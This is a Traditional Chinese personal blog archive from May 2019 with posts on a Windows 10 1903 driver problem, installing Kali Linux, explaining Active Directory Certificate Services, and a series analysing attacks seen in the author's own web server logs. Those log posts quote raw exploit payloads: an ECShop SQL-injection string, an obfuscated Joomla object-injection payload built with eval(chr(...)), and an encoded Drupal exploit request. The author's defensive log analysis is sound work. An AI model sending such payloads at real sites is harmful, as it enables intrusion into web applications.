最近 Windows 10 推出的最新版本 1903版傳出災情
傳出災情的電腦為搭載 AMD Ryzen CPU的電腦, 在特定情況下安裝更新會當機
這是因為1903版和9.2.0.105以前的AMD RAID驅動程式不相容
更新1903版時會出現嚴重錯誤導致無法完成更新而無法開機
另外還發生與舊版Qualcomm WiFi網卡驅動程式, Qualcomm及Realtek晶片的藍芽驅動程式不相容, 造成電腦更新後無法WiFi連網以及連不上藍芽裝置
建議要更新1903版者要先更新RAID驅動程式, WiFi及藍芽驅動程式
2019年5月31日 星期五
2019年5月27日 星期一
Kali Linux 系統安裝及簡單介紹
聽聞 Kali Linux 深受駭客喜愛, 很久沒有再安裝過新的Linux, 於是下載來玩玩看, Kali Linux 是基於 Debian 的 Linux 發行版, 設計用於數位鑑識和滲透測試
1. ISO檔開機後畫面, 提供多種選擇, 可進行試用或系統安裝 (沒注意到 Install(文字模式安裝)下面還有一個圖形化安裝模式, 結果安裝了兩遍...)
2. 如果選擇 Live CD 模式, 則可以不需安裝直接試用
2019年5月24日 星期五
從 Web Log 學習系統漏洞 42
web log中出現了有趣的東西, 這個 IP 嘗試600多次的 phpmyadmin 漏洞攻擊, 其中包含這一段, 估狗了一下, 似乎是一個叫 ECShop 網路商城系統的漏洞攻擊, 使用 SQL 注入方式攻擊 user.php 的 display 函數, 通常攻擊碼都會放在對網頁的需求中(如同這段攻擊的POST後), 不過這個卻是放在HTTP需求標頭裡的Referrers中(403 217之後)
61.153.205.58 - - [24/May/2019:15:37:45 +0800] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 403 217 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\"id\";s:3:\"'/*\";s:3:\"num\";s:141:\"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:4:\"name\";s:3:\"ads\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
從 Web Log 學習系統漏洞 41
一直有在注意這傢伙, 已經出現好幾個月, 只是每次都用隨機 IP 所以難以阻擋, 用關鍵字阻擋好像也沒什麼用, 就不管它了, 幾乎都是連到我這測試一些對中國批評的新聞網站
106.47.29.180 - - [23/May/2019:15:49:13 +0800] "GET http://www.123cha.com/ HTTP/1.1" 404 1829 "-" 106.47.41.85 - - [23/May/2019:15:49:13 +0800] "GET http://www.ip.cn/ HTTP/1.1" 404 1829 "-" 223.166.74.110 - - [23/May/2019:15:49:15 +0800] "CONNECT www.voanews.com:443 HTTP/1.1" 403 209 "-" 171.34.179.194 - - [23/May/2019:15:49:15 +0800] "CONNECT cn.bing.com:443 HTTP/1.1" 403 209 "-" 1.27.49.30 - - [23/May/2019:15:49:16 +0800] "GET http://boxun.com/ HTTP/1.1" 404 1829 "-" 106.45.1.121 - - [23/May/2019:15:49:18 +0800] "GET http://www.wujieliulan.com/ HTTP/1.1" 404 1829 "-" 122.96.130.202 - - [23/May/2019:15:49:19 +0800] "GET http://www.minghui.org/ HTTP/1.1" 404 1829 "-" 106.45.1.250 - - [23/May/2019:15:49:21 +0800] "GET http://www.rfa.org/english/ HTTP/1.1" 404 206 "-"
2019年5月23日 星期四
從 Web Log 學習系統漏洞 40
web log中一直持續有很多入侵, 大多還是以 phpmyadmin 的漏洞攻擊資料庫
今天的紀錄, 估狗了一下, 這傢伙好像是要測試某種網路攝影機的漏洞, 所以他入侵之後能幹啥? 問題是我沒有裝網路攝影機
今天的紀錄, 估狗了一下, 這傢伙好像是要測試某種網路攝影機的漏洞, 所以他入侵之後能幹啥? 問題是我沒有裝網路攝影機
221.213.75.144 - - [23/May/2019:15:48:55 +0800] "GET / HTTP/1.1" 200 1829 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019年5月5日 星期日
從 Web Log 學習系統漏洞 39
新東西, Log中的紀錄, 好像是 Joomla 架站套件的漏洞攻擊
103.210.239.214 - - [05/May/2019:20:07:50 +0800] "GET / HTTP/1.1" 200 1829 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:277:\"eval(chr(100).chr(105).chr(101).chr(40).chr(109).chr(100).chr(53).chr(40).chr(68).chr(73).chr(82).chr(69).chr(67).chr(84).chr(79).chr(82).chr(89).chr(95).chr(83).chr(69).chr(80).chr(65).chr(82).chr(65).chr(84).chr(79).chr(82).chr(41).chr(41).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
103.210.239.214 - - [05/May/2019:20:07:50 +0800] "GET / HTTP/1.1" 200 1829 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:277:\"eval(chr(100).chr(105).chr(101).chr(40).chr(109).chr(100).chr(53).chr(40).chr(68).chr(73).chr(82).chr(69).chr(67).chr(84).chr(79).chr(82).chr(89).chr(95).chr(83).chr(69).chr(80).chr(65).chr(82).chr(65).chr(84).chr(79).chr(82).chr(41).chr(41).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
從 Web Log 學習系統漏洞 38
log中的紀錄, 大概是 Drupal 漏洞攻擊, 以前好像也有被類似的方式攻擊過
103.210.239.214 - - [05/May/2019:20:07:49 +0800] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6http://www.w-studio.idv.tw/ HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
解碼紅色內容:
/user/register?element_parents=timezone/timezone/#value&ajax_form=1&_wrapper_format=drupal_ajax
103.210.239.214 - - [05/May/2019:20:07:49 +0800] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6http://www.w-studio.idv.tw/ HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
解碼紅色內容:
/user/register?element_parents=timezone/timezone/#value&ajax_form=1&_wrapper_format=drupal_ajax
2019年5月1日 星期三
什麼是ADCS (Active Directory Certificate Services)
Active Directory Certificate Services(ADCS, AD憑證服務)是 Windows Server角色之一, 可用來發行與管理用於安全通訊和驗證通訊協定的 Public Key Infrastructure(PKI, 公開金鑰基礎架構)憑證, 數位憑證可用來加密和數位簽署電子文件和訊息, 以及驗證網路上的電腦、使用者或裝置帳戶
憑證服務通常由一個或多個憑證授權中心(Certificate Authorities, CA)組成, 它們負責發行、管理和撤銷數位憑證, 當用戶或實體需要一個數位憑證時他們可以向憑證服務提交請求, 該服務將核發一個符合要求的憑證並提供給請求者
憑證服務的主要功能包括:
1.數位憑證發行: 憑證服務負責根據請求者的身份和需求發行相應的數位憑證以供身份驗證、加密和數位簽名等用途
2.憑證管理: 憑證服務管理已經發行的憑證, 包括追踪憑證的有效期、狀態和使用情況, 並提供憑證撤銷等管理功能
3.憑證撤銷: 當憑證擁有者的私鑰被洩漏、憑證遺失或者用戶離開組織時, 憑證服務可以撤銷相應的憑證以保護安全性
4.憑證更新: 憑證服務可以管理憑證的更新, 確保用戶持續獲得有效的憑證
5.安全通信: 通過提供可信任的數位憑證, 憑證服務可以保護通信的安全性確保敏感資訊不會被窺視或篡改